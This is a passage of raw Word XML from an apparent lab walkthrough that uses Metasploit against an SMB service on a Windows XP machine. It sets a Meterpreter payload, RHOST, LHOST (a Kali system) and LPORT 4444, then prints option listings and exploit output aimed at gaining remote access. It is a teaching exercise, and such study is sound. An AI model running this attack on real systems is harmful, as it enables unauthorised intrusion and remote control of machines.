        <w:t>The following command may be used to load the exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A5892A" w14:textId="768C00DF" w:rsidR="00830C65" w:rsidRDefault="00830C65" w:rsidP="00BE149A">
      <w:pPr>
        <w:widowControl/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75210D23"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03850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p>
    <w:p w14:paraId="740A6B83" w14:textId="1001FBAB" w:rsidR="00830C65" w:rsidRDefault="00830C65" w:rsidP="00BE149A">
      <w:pPr>
        <w:widowControl/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8F9AE6" w14:textId="18C898B2" w:rsidR="00BE149A" w:rsidRDefault="00D84791" w:rsidP="00D84791">
      <w:pPr>
        <w:pStyle w:val="Heading8"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Once the exploit has loaded use Meterpreter as the payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1090D8CD" w14:textId="1FD9EED1" w:rsidR="00830C65" w:rsidRDefault="00830C65" w:rsidP="00BE149A">
      <w:pPr>
        <w:widowControl/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58AB1542"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84797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365B5D9E"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847971"/>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1C0C1ABB" w14:textId="6A234BAA" w:rsidR="00830C65" w:rsidRPr="00830C65" w:rsidRDefault="00830C65" w:rsidP="00830C6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8EAA44A" w14:textId="11B546A6" w:rsidR="00A511F7" w:rsidRPr="00D84791" w:rsidRDefault="00D84791" w:rsidP="00D84791">
      <w:pPr>
        <w:pStyle w:val="Heading9"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84791">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Next, lets configure the exploit to run in the desired target system, by setting the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84791">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">emote host’s IP address (Windows XP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>system</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84791">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00830C65" w:rsidRPr="00D84791">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75ABF7A5" w14:textId="6148706C" w:rsidR="00830C65" w:rsidRDefault="00830C65" w:rsidP="00A511F7">
      <w:pPr>
        <w:widowControl/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F21623D"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926068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RHOST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5EC27CCC"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9260681"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">RHOST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024D2DCC" w14:textId="663A989D" w:rsidR="00830C65" w:rsidRPr="00830C65" w:rsidRDefault="00830C65" w:rsidP="00830C6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30DC643" w14:textId="1E0378CF" w:rsidR="00830C65" w:rsidRDefault="00D84791" w:rsidP="00A511F7">
      <w:pPr>
        <w:widowControl/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Subsequently, </w:t>
      </w:r>
      <w:r w:rsidR="00E00993">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>set the local host</w:t>
      </w:r>
      <w:r w:rsidR="00834D24">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>’s IP address</w:t>
      </w:r>
      <w:r w:rsidR="00E00993">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> option </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">as follows </w:t>
      </w:r>
      <w:r w:rsidR="00E00993">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>(Kali Linux system):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="665E0911" w14:textId="77777777" w:rsidR="00E00993" w:rsidRDefault="00E00993" w:rsidP="00A511F7">
      <w:pPr>
        <w:widowControl/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CE9783F"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809122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13B6E70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8091221"/>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749A0246" w14:textId="6AC8A3DE"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0C814E15" w14:textId="57DC9DB5" w:rsidR="00830C65" w:rsidRDefault="00D84791" w:rsidP="00A511F7">
      <w:pPr>
        <w:widowControl/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>V</w:t>
      </w:r>
      <w:r w:rsidR="00E00993">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>erify that the settings</w:t>
      </w:r>
      <w:r w:rsidR="00E114B7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> were </w:t>
      </w:r>
      <w:r w:rsidR="00E00993">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>properly</w:t>
      </w:r>
      <w:r w:rsidR="00E114B7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> added</w:t>
      </w:r>
      <w:r w:rsidR="00E00993">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44500E8A" w14:textId="77777777" w:rsidR="00830C65" w:rsidRPr="00A511F7" w:rsidRDefault="00830C65" w:rsidP="00A511F7">
      <w:pPr>
        <w:widowControl/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EDB18DE"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bookmarkStart w:id="4" w:name="_Hlk20498380"/>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bookmarkEnd w:id="4"/>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show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5655C90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340CE25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Module</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> options </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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p>
    <w:p w14:paraId="6D54C9B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68CAAF8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Name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Current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Setting</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Required</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Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42BD475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6647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RHOSTS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target address range </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>or</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> CIDR identifier</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D46EA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RPORT    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>445</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SMB service port </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>TCP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A5C29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SMBPIPE  BROWSER</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">          yes       </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> pipe name to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>use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BROWSER</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> SRVSVC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A266D4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6F3BEC0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Payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> options </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r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68DAA63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2726F4D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Name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Current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Setting</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Required</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Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8B3DF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4D5C5A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EXITFUNC  thread</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">           yes       </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Exit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> technique </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Accepted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seh</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thread</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> process</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> none</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380BD6EE"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lastRenderedPageBreak/>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listen address </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">an </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>interface</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> may be specified</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="394144B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LPORT     </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>4444</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listen port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F5518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3944B0D5"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Exploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> target</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B40B598"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1C83565F"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p>
    <w:p w14:paraId="75953F4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AA16B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0066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Automatic</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Targeting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76DC5BD2" w14:textId="0D35FE57"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3D59D29" w14:textId="27204B65" w:rsidR="00A511F7" w:rsidRDefault="00E00993" w:rsidP="00733AF0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>After verifying that the options were added properly, we are ready to exploit and gain remote access to the system:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17BECCE7" w14:textId="1CA20DCB" w:rsidR="00E00993" w:rsidRDefault="00E00993" w:rsidP="00733AF0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="098EE68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4A2EBB6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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD77F7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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F428C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Automatically</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> detecting the target</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47176C5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Fingerprint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XP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Service</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Pack</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lang</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>English</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="68A350D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Selected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Target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XP SP3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>English</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AlwaysOn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> NX</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
